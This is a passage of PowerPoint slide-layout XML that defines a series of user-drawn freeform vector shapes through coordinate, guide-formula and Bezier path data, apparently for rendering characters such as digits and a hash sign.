            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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29"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Freeform 278"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="739"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 110 w 127"/>
                  <a:gd name="T5" fmla="*/ 176 h 203"/>
                  <a:gd name="T6" fmla="*/ 90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Freeform 280"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="743"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 219"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 219"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61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60 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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281"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="739"/>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2"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Freeform 282"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="739"/>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1"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="110" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="185"/>
                      <a:pt x="97" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="61" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="169"/>
                      <a:pt x="6" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="11"/>
                      <a:pt x="37" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="127" y="34"/>
                      <a:pt x="127" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="47"/>
                      <a:pt x="91" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="47"/>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283"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="738"/>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Freeform 284"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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285"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 286"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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6" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>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287"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 288"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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2" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36"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289"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="738"/>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4 h 200"/>
                  <a:gd name="T10" fmla="*/ 13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3"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="28"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>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Freeform 290"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="738"/>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4 h 200"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 50 h 200"/>
                  <a:gd name="T12" fmla="*/ 0 w 67"/>
                  <a:gd name="T13" fmla="*/ 54 h 200"/>
                  <a:gd name="T14" fmla="*/ 0 w 67"/>
                  <a:gd name="T15" fmla="*/ 32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3"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="37" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="30" y="41"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="30"/>
                      <a:pt x="10" y="28"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>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291"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5978"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3" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="56"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Freeform 292"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6175"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1" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="28"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>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293"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6324"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Freeform 294"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6519" y="739"/>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0" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>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4"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="91"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295"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944" y="738"/>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4 h 200"/>
                  <a:gd name="T10" fmla="*/ 13 w 68"/>
                  <a:gd name="T11" fmla="*/ 50 h 200"/>
                  <a:gd name="T12" fmla="*/ 0 w 68"/>
                  <a:gd name="T13" fmla="*/ 54 h 200"/>
                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                  <a:gd name="T15" fmla="*/ 32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3"/>
                      <a:pt x="41" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="28"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>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Freeform 296"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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3"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297"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7287" y="739"/>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1"/>
                      <a:pt x="124" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="157"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="111" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="73" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="44" y="201"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="17" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="5" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>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4"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="47"/>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Freeform 298"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7484" y="738"/>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4 h 200"/>
                  <a:gd name="T10" fmla="*/ 14 w 68"/>
                  <a:gd name="T11" fmla="*/ 50 h 200"/>
                  <a:gd name="T12" fmla="*/ 0 w 68"/>
                  <a:gd name="T13" fmla="*/ 54 h 200"/>
                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                  <a:gd name="T15" fmla="*/ 32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3"/>
                      <a:pt x="42" y="35"/>
                      <a:pt x="38" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="39"/>
                      <a:pt x="31" y="41"/>
                      <a:pt x="27" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="19" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="11" y="28"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>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299"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7633" y="739"/>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1"/>
                      <a:pt x="123" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="167"/>
                      <a:pt x="111" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="16" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="88"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="47"/>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Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="730"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 202 h 209"/>
                  <a:gd name="T8" fmla="*/ 3 w 179"/>
                  <a:gd name="T9" fmla="*/ 184 h 209"/>
                  <a:gd name="T10" fmla="*/ 14 w 179"/>
                  <a:gd name="T11" fmla="*/ 159 h 209"/>
                  <a:gd name="T12" fmla="*/ 10 w 179"/>
                  <a:gd name="T13" fmla="*/ 162 h 209"/>
                  <a:gd name="T14" fmla="*/ 7 w 179"/>
                  <a:gd name="T15" fmla="*/ 183 h 209"/>
                  <a:gd name="T16" fmla="*/ 46 w 179"/>
                  <a:gd name="T17" fmla="*/ 202 h 209"/>
                  <a:gd name="T18" fmla="*/ 43 w 179"/>
                  <a:gd name="T19" fmla="*/ 152 h 209"/>
                  <a:gd name="T20" fmla="*/ 26 w 179"/>
                  <a:gd name="T21" fmla="*/ 133 h 209"/>
                  <a:gd name="T22" fmla="*/ 52 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
